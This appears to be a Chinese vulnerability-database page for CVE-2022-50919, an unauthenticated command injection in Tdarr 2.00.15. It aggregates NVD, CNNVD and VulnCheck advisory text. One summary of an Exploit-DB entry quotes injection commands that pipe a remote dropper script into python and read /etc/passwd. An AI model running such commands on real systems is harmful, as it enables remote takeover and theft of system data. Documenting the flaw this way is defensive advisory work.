支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:736

73.6%
一、 漏洞 CVE-2022-50919 基础信息
漏洞信息
                                        # Tdarr 2.00.15 命令注入漏洞

N/A
                                        
神龙判断

是否为 Web 类漏洞: 未知

判断理由:

N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
Tdarr 2.00.15 - Command Injection
来源:美国国家漏洞数据库 NVD
漏洞描述信息
Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
来源:美国国家漏洞数据库 NVD
漏洞类别
OS命令中使用的特殊元素转义处理不恰当(OS命令注入)
来源:美国国家漏洞数据库 NVD
漏洞标题
Tdarr 操作系统命令注入漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
Tdarr是Tdarr公司的一个多媒体转码自动化平台。 Tdarr 2.00.15版本存在操作系统命令注入漏洞,该漏洞源于Help终端存在未经身份验证的远程代码执行,可能导致攻击者注入并链接任意命令。
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
授权问题
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2022-50919 的公开POC
#POC 描述源链接神龙链接
三、漏洞 CVE-2022-50919 的情报信息
  • 标题: Tdarr 2.00.15 - Command Injection - Multiple remote Exploit -- 🔗来源链接

    标签:exploit

    神龙速读:
                                            从该网页截图中可以获取到以下漏洞的关键信息:
    
    - **漏洞标题**: Tdarr 2.00.15 - Command Injection
    - **EDB-ID**: 50822
    - **CVE**: N/A
    - **作者**: Sam Smith
    - **漏洞类型**: Remote
    - **平台**: Multiple
    - **发布日期**: 2022-03-11
    - **漏洞应用**: Tdarr
    - **验证状态**: 未验证
    - **相关链接**:
      - 厂商主页: `https://tdarr.io`
      - 软件链接: `https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip`
    - **漏洞版本范围**: 2.00.15 (可能包括旧版本)
    - **测试版本**: 2.00.15
    - **漏洞描述**: Tdarr 应用中的 Help 选项卡包含 FFmpeg 和 HandBrake 的终端,但这些终端未包含输入过滤,允许用户连接命令并生成反向Shell。
    - **示例攻击命令**: 
      ```
      --help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`.
      ```
                                            
    Tdarr 2.00.15 - Command Injection - Multiple remote Exploit
  • 标题: Tdarr -- 🔗来源链接

    标签:product

    神龙速读:
                                            从提供的截图中,我们看不到任何特定的文本或图像内容,但以下是从网页结构可以推测出的潜在安全相关的观察点:
    
    - **用户界面的可能暗示**:导航栏包含典型的网站元素如"Home"、"Download"、"Docs"等,这暗示了一个可能是软件或服务的官方网站。缺少可见的内容或错误消息可能表明网站处于维护状态,或者存在配置错误。
    
    - **潜在的XSS风险**:如果网站接受用户输入但未正确处理或显示,攻击者可能尝试注入恶意脚本来执行跨站脚本攻击(XSS)。
    
    - **缺少内容的异常**:页面的空白内容可以表明存在服务器端错误,如500 Internal Server Error,这种错误可能暴露服务器的技术细节,为攻击者提供利用信息。
    
    在没有更多上下文或可见内容的情况下,这些只是基于网站结构的理论推测。
    
    ---
    
    要准确识别网页中的安全漏洞,需要实际的内容或错误消息,以及对网站后端的了解。
                                            
    Tdarr
  • 标题: Tdarr 2.00.15 - Command Injection | Advisories | VulnCheck -- 🔗来源链接

    标签:third-party-advisory

    神龙速读:
                                            ## Tdarr 2.00.15 - Command Injection
    
    ### Severity
    - Critical
    
    ### Date
    - January 13, 2026
    
    ### Affecting
    - Tdarr 2.00.15
    
    ### CVE
    - CVE-2022-50919 ![Search](https://img.icons8.com/color/24/000000/search.png)
    
    ### CWE
    - CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
    
    ### CVSS
    - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    
    ### References
    - [ExploitDB-50822 ![External Link](https://img.icons8.com/color/24/000000/external-link.png)](https://exploitdb.com/exploits/50822)
    - [Official Vendor Homepage ![External Link](https://img.icons8.com/color/24/000000/external-link.png)](https://tdarr.net)
    
    ### Credit
    - Sam Smith
    
    ### Description
    - Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like '--help; curl .py | python' to execute remote code without authentication.
                                            
    Tdarr 2.00.15 - Command Injection | Advisories | VulnCheck
  • https://nvd.nist.gov/vuln/detail/CVE-2022-50919
四、漏洞 CVE-2022-50919 的评论
匿名用户
2026-01-15 06:08:46

Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.


发表评论